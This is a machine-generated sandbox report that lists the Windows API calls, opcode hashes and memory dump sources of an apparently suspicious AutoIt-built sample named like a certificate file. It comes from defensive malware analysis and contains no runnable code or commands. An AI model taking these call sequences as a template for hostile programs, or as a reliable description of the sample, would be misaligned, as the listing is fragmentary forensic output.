                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 3864802216-0
                                                                                • Opcode ID: cb33b1641a3fcb94bff961acb297bfd7baa798b51c61d44e641df110ae70e3cd
                                                                                • Instruction ID: 0b8ca99b2b20ed372764c7040e1817eaf68f9fad1ef31167897450a7844c1815
                                                                                • Opcode Fuzzy Hash: cb33b1641a3fcb94bff961acb297bfd7baa798b51c61d44e641df110ae70e3cd
                                                                                • Instruction Fuzzy Hash: 06316B72200614BFEB109F54CC4AFEA3BA9FF4A715F044065FE49DA291DAB59841CBB4
                                                                                APIs
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                  • Part of subcall function 0085C6F4: _wcscpy.LIBCMT ref: 0085C717
                                                                                • _wcstok.LIBCMT ref: 0089184E
                                                                                • _wcscpy.LIBCMT ref: 008918DD
                                                                                • _memset.LIBCMT ref: 00891910
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                • String ID: X
                                                                                • API String ID: 774024439-3081909835
                                                                                • Opcode ID: 2fad5fbb3e45bf38daf0fde2efa2412e4b92afb27874145431cb17df6059fb5e
                                                                                • Instruction ID: cbc7108d779157f40237b23ec3fd71421d32ce9f6fcf957bea3b7d6ba1b0ba58
                                                                                • Opcode Fuzzy Hash: 2fad5fbb3e45bf38daf0fde2efa2412e4b92afb27874145431cb17df6059fb5e
                                                                                • Instruction Fuzzy Hash: E6C15C315083559FCB24EF28C885A6AB7E4FF85354F04492DF99AD72A2DB30ED05CB82
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • GetSystemMetrics.USER32(0000000F), ref: 008B016D
                                                                                • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 008B038D
                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 008B03AB
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?), ref: 008B03D6
                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 008B03FF
                                                                                • ShowWindow.USER32(00000003,00000000), ref: 008B0421
                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 008B0440
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                • String ID:
                                                                                • API String ID: 3356174886-0
                                                                                • Opcode ID: 95be81bc839a61a8d0020f5d8a496f4db2dd18ff90928beb0c294ac38f819423
                                                                                • Instruction ID: a4661b6424be7b2f542323049e9dcf2b4678b9b5cc70ddb18be26a1d1b9f5fa6
                                                                                • Opcode Fuzzy Hash: 95be81bc839a61a8d0020f5d8a496f4db2dd18ff90928beb0c294ac38f819423
                                                                                • Instruction Fuzzy Hash: 2DA17B3560061AAFDB18CF68C989BEEBBB1FB08705F148125E855EB394DB74AD50CF90
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e390c1471f3dc3374b41e78d12c843848925eeaeda7e4535f1729d1a7637ea7
                                                                                • Instruction ID: 6a18152b99d394c673d10090f33bec1afae0fccecc3ae251a1edd8acb2f29cd7
                                                                                • Opcode Fuzzy Hash: 3e390c1471f3dc3374b41e78d12c843848925eeaeda7e4535f1729d1a7637ea7
                                                                                • Instruction Fuzzy Hash: E1716BB0900509EFCB08DF98CC89EEEBB74FF89315F148259F915A7251D730AA45CB61
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008A225A
                                                                                • _memset.LIBCMT ref: 008A2323
                                                                                • ShellExecuteExW.SHELL32(?), ref: 008A2368
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                  • Part of subcall function 0085C6F4: _wcscpy.LIBCMT ref: 0085C717
                                                                                • CloseHandle.KERNEL32(00000000), ref: 008A242F
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 008A243E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                • String ID: @
                                                                                • API String ID: 4082843840-2766056989
                                                                                • Opcode ID: 3b99e6e5c2527da4ec62ab91eda83ffc380e9e9f359e987a71b045e21ee8ce7e
                                                                                • Instruction ID: a38844464ebc95f7d6e003fed0eb8da0fb25f223642463be1c9a9bc885410386
                                                                                • Opcode Fuzzy Hash: 3b99e6e5c2527da4ec62ab91eda83ffc380e9e9f359e987a71b045e21ee8ce7e
                                                                                • Instruction Fuzzy Hash: D3718D70A006199FDF25EFA8C88199EBBF5FF49310F108459E846EB761DB34AD40CB95
                                                                                APIs
                                                                                • GetParent.USER32(?), ref: 00883DE7
                                                                                • GetKeyboardState.USER32(?), ref: 00883DFC
                                                                                • SetKeyboardState.USER32(?), ref: 00883E5D
                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00883E8B
                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00883EAA
                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00883EF0
                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00883F13
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: 11a8fe5a8775a58031eece6d61efb23a53f790bc9a11aadaf101abf9b2e24054
                                                                                • Instruction ID: 3b72fcc831a4f78a4f2a1b9b46f51cdcd40c90fa2e2b57435fffed061279b8be
                                                                                • Opcode Fuzzy Hash: 11a8fe5a8775a58031eece6d61efb23a53f790bc9a11aadaf101abf9b2e24054
                                                                                • Instruction Fuzzy Hash: 2751E5A0A047D53DFB3663288C45BB67EA5BB06B04F084589F1D5C68C3D7E8AEC4D751
                                                                                APIs
                                                                                • GetParent.USER32(00000000), ref: 00883C02
                                                                                • GetKeyboardState.USER32(?), ref: 00883C17
                                                                                • SetKeyboardState.USER32(?), ref: 00883C78
                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00883CA4
                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00883CC1
                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00883D05
                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00883D26
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                • String ID:
                                                                                • API String ID: 87235514-0
                                                                                • Opcode ID: d72c3c6f4d80c4aa0c6525c9255f8b02ae2280d9088cf6ccb02a20e4cc5f997c
                                                                                • Instruction ID: 06058445aa11055e743c4c0730a1bbb86b1bcea1c08790d0ba05ad0852c961ae
                                                                                • Opcode Fuzzy Hash: d72c3c6f4d80c4aa0c6525c9255f8b02ae2280d9088cf6ccb02a20e4cc5f997c
                                                                                • Instruction Fuzzy Hash: AA5107A15047D53DFB32A7388C55B76BFA9FF06B00F088488E0D5DA8C2D294EE84E761
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsncpy$LocalTime
                                                                                • String ID:
                                                                                • API String ID: 2945705084-0
                                                                                • Opcode ID: a48e5c55c8b69d29b4ba121b307b23108ad1f42cbcea08c2b35bce2f4e7f72da
                                                                                • Instruction ID: a2d6e052bcf988ec5cb3ed70cfde348480d5f0bb8a983ea1e48601809e39f543
                                                                                • Opcode Fuzzy Hash: a48e5c55c8b69d29b4ba121b307b23108ad1f42cbcea08c2b35bce2f4e7f72da
                                                                                • Instruction Fuzzy Hash: 03415266C1021876DB20ABF8CC4A9CF73BCFF04310F5549A6E504E3261EA34D614C7A6
                                                                                APIs
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 008A3DA1
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008A3DCB
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 008A3E80
                                                                                  • Part of subcall function 008A3D72: RegCloseKey.ADVAPI32(?), ref: 008A3DE8
                                                                                  • Part of subcall function 008A3D72: FreeLibrary.KERNEL32(?), ref: 008A3E3A
                                                                                  • Part of subcall function 008A3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 008A3E5D
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 008A3E25
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                • String ID:
                                                                                • API String ID: 395352322-0
                                                                                • Opcode ID: 29bee221c9bcf6fec898542d03a2c4cb9a1e71aa0181538f16d15c250fe53ca8
                                                                                • Instruction ID: 6574174cf8469f1588064cc005c36d856a5eadf08ef47a356d078780b8a8fd89
                                                                                • Opcode Fuzzy Hash: 29bee221c9bcf6fec898542d03a2c4cb9a1e71aa0181538f16d15c250fe53ca8
                                                                                • Instruction Fuzzy Hash: F931CAB1901219BFEB159B94DC85EFFB7BCFB09300F00416AF512E2550D6749F499BA0
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008A8FE7
                                                                                • GetWindowLongW.USER32(00C7DF38,000000F0), ref: 008A901A
                                                                                • GetWindowLongW.USER32(00C7DF38,000000F0), ref: 008A904F
                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008A9081
                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008A90AB
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 008A90BC
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008A90D6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 2178440468-0
                                                                                • Opcode ID: 244c0734cc2e3f0ee553bc912023f01727f106c09a619296d2559641109860e1
                                                                                • Instruction ID: 71037f5f730aedfd74726ef8bad6efe624b5604863093c878286ece92777be52
                                                                                • Opcode Fuzzy Hash: 244c0734cc2e3f0ee553bc912023f01727f106c09a619296d2559641109860e1
                                                                                • Instruction Fuzzy Hash: 98313274608215EFEB20CF58DC84F6437A9FB5A354F154164F699CB6B2CBB2A840DB81
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008808F2
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00880918
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0088091B
                                                                                • SysAllocString.OLEAUT32(?), ref: 00880939
                                                                                • SysFreeString.OLEAUT32(?), ref: 00880942
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00880967
                                                                                • SysAllocString.OLEAUT32(?), ref: 00880975
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: 762b1fca45724d86e88a9075c5df27a7280e05322ebd72f8d92a5614d55e14d7
                                                                                • Instruction ID: f0500421bcee50b91d9e338e24e60de9412e3e260830d295c71cc995c75757c9
                                                                                • Opcode Fuzzy Hash: 762b1fca45724d86e88a9075c5df27a7280e05322ebd72f8d92a5614d55e14d7
                                                                                • Instruction Fuzzy Hash: 6D219576601219AFAB50AF68DC88DAB77BCFB09360B008135FA15DB152D670EC498B64
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                • API String ID: 1038674560-2734436370
                                                                                • Opcode ID: 5588cc8829d1a4ee8f1be74a7d90d70fe07cbfa373a5094f62de131982e9982a
                                                                                • Instruction ID: 4709378001819ab5e83fb8e03d6020f46450919348494e5430f08e460c923a11
                                                                                • Opcode Fuzzy Hash: 5588cc8829d1a4ee8f1be74a7d90d70fe07cbfa373a5094f62de131982e9982a
                                                                                • Instruction Fuzzy Hash: FB21797228021577C731FA388C02EBB7398FF64304F20802AF846E7182E6559D42C3AA
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008809CB
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008809F1
                                                                                • SysAllocString.OLEAUT32(00000000), ref: 008809F4
                                                                                • SysAllocString.OLEAUT32 ref: 00880A15
                                                                                • SysFreeString.OLEAUT32 ref: 00880A1E
                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00880A38
                                                                                • SysAllocString.OLEAUT32(?), ref: 00880A46
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                • String ID:
                                                                                • API String ID: 3761583154-0
                                                                                • Opcode ID: 45a8c122db9dc0c641bf739ef590cfc5466f7a9bc63612f331f90c9af71c4b21
                                                                                • Instruction ID: bbe11281e1722d74732f22c0bb535d0626e05b8934e64cdf9bfb93abdfc38b9b
                                                                                • Opcode Fuzzy Hash: 45a8c122db9dc0c641bf739ef590cfc5466f7a9bc63612f331f90c9af71c4b21
                                                                                • Instruction Fuzzy Hash: C4214475604214AFDB54EFA8DC89DBAB7ECFF093607448135FA09CB261E670EC858B64
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 008ADEB0
                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 008ADED4
                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 008ADEEC
                                                                                • GetSystemMetrics.USER32(00000004), ref: 008ADF14
                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00893A1E,00000000), ref: 008ADF32
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$MetricsSystem
                                                                                • String ID: MZER
                                                                                • API String ID: 2294984445-2424380061
                                                                                • Opcode ID: 5743b4e647187fe8bd01b29b4a9bda0652ce68c8369904982793c26ddf64f865
                                                                                • Instruction ID: 86ac4538d8d853b7ac7e5c7a8c4956423d5132bf4b57846e6c9842b4dc7cf59a
                                                                                • Opcode Fuzzy Hash: 5743b4e647187fe8bd01b29b4a9bda0652ce68c8369904982793c26ddf64f865
                                                                                • Instruction Fuzzy Hash: 43219071615716AFEB205F789C48B6A77A8FB16329B150734F927CADE0DB709860CA80
                                                                                APIs
                                                                                  • Part of subcall function 0085D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0085D1BA
                                                                                  • Part of subcall function 0085D17C: GetStockObject.GDI32(00000011), ref: 0085D1CE
                                                                                  • Part of subcall function 0085D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0085D1D8
                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 008AA32D
                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 008AA33A
                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 008AA345
                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 008AA354
                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 008AA360
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                • String ID: Msctls_Progress32
                                                                                • API String ID: 1025951953-3636473452
                                                                                • Opcode ID: ac625e10836ef7a024fe7ed0a7419bf29ba18716f6e1fe2b38880ee41a9c9756
                                                                                • Instruction ID: 70fc8fd3a3b7c1a64f39c857f4dfafb4491ff420b98408bb0f8f06a2da298c0e
                                                                                • Opcode Fuzzy Hash: ac625e10836ef7a024fe7ed0a7419bf29ba18716f6e1fe2b38880ee41a9c9756
                                                                                • Instruction Fuzzy Hash: 5D115BB115021DBEEF159FA4CC86EEB7F6DFF09798F014115BA08A61A0C7729C21DBA4
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 0085CCF6
                                                                                • GetWindowRect.USER32(?,?), ref: 0085CD37
                                                                                • ScreenToClient.USER32(?,?), ref: 0085CD5F
                                                                                • GetClientRect.USER32(?,?), ref: 0085CE8C
                                                                                • GetWindowRect.USER32(?,?), ref: 0085CEA5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$Client$Window$Screen
                                                                                • String ID:
                                                                                • API String ID: 1296646539-0
                                                                                • Opcode ID: 2518edc41f641ecf546aac44d7b80fade1f34ddc23af4c71404105348a67b3f1
